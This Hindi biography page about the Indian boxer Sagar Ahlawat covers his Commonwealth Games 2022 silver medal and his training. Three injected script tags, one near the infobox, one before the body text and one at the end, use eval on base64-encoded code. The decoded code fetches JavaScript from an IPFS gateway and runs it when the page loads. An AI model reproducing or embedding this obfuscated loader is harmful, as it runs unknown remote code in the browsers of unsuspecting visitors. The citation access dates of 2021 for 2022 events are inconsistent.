सागर अहलावत

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
सागर अहलावत
सागर अहलावत
पूरा नाम सागर अहलावत
जन्म 7 जुलाई, 2000
जन्म भूमि ज़िला झज्जर, हरियाणा
अभिभावक माता- मुकेश अहलावत

पिता- राजेश अहलावत

कर्म भूमि भारत
खेल-क्षेत्र मुक्केबाज़ी
शिक्षा कला स्नातक
विद्यालय गोस्वामी गणेश दत्ता सनातन धर्म कॉलेज, चंडीगढ़
प्रसिद्धि मुक्केबाज़
नागरिकता भारतीय
संबंधित लेख राष्ट्रमंडल खेल, राष्ट्रमंडल खेल 2022, राष्ट्रमंडल खेल 2018
कोच हितेश देशवाल
अद्यतन‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>सागर अहलावत (अंग्रेज़ी: Sagar Ahlawat, जन्म- 7 जुलाई, 2000) भारतीय मुक्केबाज़ हैं। उन्होंने बर्मिंघम, इंग्लैंड में आयोजित राष्ट्रमंडल खेल 2022 में पुरुषों के ओवर 92 कि।ग्रा। वर्ग के फाइनल में भारत के लिये रजत पदक जीता। उन्हें मुक्केबाज़ी के सुपर हेवीवेट कैटेगरी यानी 92 किलोग्राम भारवर्ग में रजत पदक से संतोष करना पड़ा। सागर अहलावत को फाइनल में इंग्लैंड के डेलिशियस ओरी ने 5-0 से हराया।

प्रेरणा

सागर अहलावत ने अपने सफर के बारे में बात करते हुए कहा था कि साल 2015 में जब फ्लॉएड मेवेदर जूनियर और मैनी पैकियाओ के बीच 'फाइट ऑफ द सेंचुरी' हुई थी तो उस छपे समाचार पत्र के एक लेख ने उनकी जिंदगी बदल दी। इस आर्टिकल को पढ़ने के बाद ही उन्होंने मुक्केबाज़ी को अपना कॅरियर चुना।

उनका कहना था कि मैं पढ़ाई में अच्छा नहीं था। मेरे से पढ़ाई नहीं होती थी। इसलिये मैंने 12वीं के बाद कुछ करने के लिये देखना शुरू किया। मेरे परिवार में कोई भी खेलों में नहीं है। मुझे थोड़ा बहुत मुक्केबाज़ी के बारे में पता था लेकिन मुझे मेवेदर और पैकियाओ के बारे में अखबार में पढ़कर प्रेरणा मिली। सागर अहलावत किसान परिवार से आते हैं और उनके परिवार में से किसी का भी खेलों से कोई लेना देना नहीं है। लेकिन जब अखबार में मेवेदर और पैकियाओ की उपलब्धियों के बारे में पढ़ा तो समझ आ गया कि उन्हें क्या करना है। हालांकि घर पर मदद करने के लिये उन्हें कई बार अपनी ट्रेनिंग को बीच में ही छोड़ना पड़ा। दो साल बाद उन्होंने अखिल भारतीय विश्वविद्यालय खेलों में स्वर्ण पदक जीता। इसके बाद उन्होंने 'खेलो इंडिया विश्वविद्यालय खेलों' में लगातार खिताब जीते।[1]

राष्ट्रमंडल खेल, 2022

सागर अहलावत ने राष्ट्रमंडल खेल 2022 में भारत के लिये रजत पदक जीता। बॉक्सिंग में सुपर हेवीवेट कैटेगरी यानी 92 किलोग्राम भारवर्ग में उनको रजत से संतोष करना पड़ा। उन्हें फाइनल में इंग्लैंड के डेलिशियस ओरी ने 5-0 से हरा दिया। सागर अहलावत ने अपनी पहली ही अंतरराष्ट्रीय स्तर की प्रतियोगिता में रजत पदक जीता है। अब पहली बार में ही चार साल की कठोर मेहनत के बाद मुक्केबाजी में परचम लहरा रहा है। सागर अहलावत ने 4 अगस्त, 2022 को अपना क्वार्टर फाइनल मैच 5-0 से जीता था और 6 अगस्त को सेमीफाइनल भी उसी अंदाज में 5-0 से जीत कर देश के लिए रजत पदक पक्का किया। अब सागर अहलावत की नजर आने वाली प्रतियोगिताओं में देश के लिए स्वर्ण जीतने पर रहेगी।

कोरोना काल में भी अभ्यास

कोरोना काल के दौरान जब कैंप बंद हुए तो कोच हितेश देशवाल ने सागर अहलावत को अकेले भी प्रेक्टिस कराई। कॉमनवेल्थ गेम्स के ट्रायल में सागर अहलावत ने शानदार प्रदर्शन किया और पहले ट्रायल में ओलंपिक 2020 प्रतिभागी सतीश कुमार को हराया, फिर फाइनल में नरेंद्र को मात दी। उनके प्रदर्शन की बदौलत उनका चयन 28 जुलाई, 2022 से 8 अगस्त, 2022 तक इंग्लैंड के बर्मिंघम में आयोजित होने वाले राष्ट्रमंडल खेलों में हो गया।[2]


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. सागर अहलावत के 7 साल पुराने आर्टिकल ने बदली जिंदगी (हिंदी) jantaserishta.com। अभिगमन तिथि: 08 सितंबर, 2021।
  2. झज्जर के सागर अहलावत ने मुक्केबाजी में जीता रजत (हिंदी) amarujala.com। अभिगमन तिथि: 08 सितंबर, 2021।

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>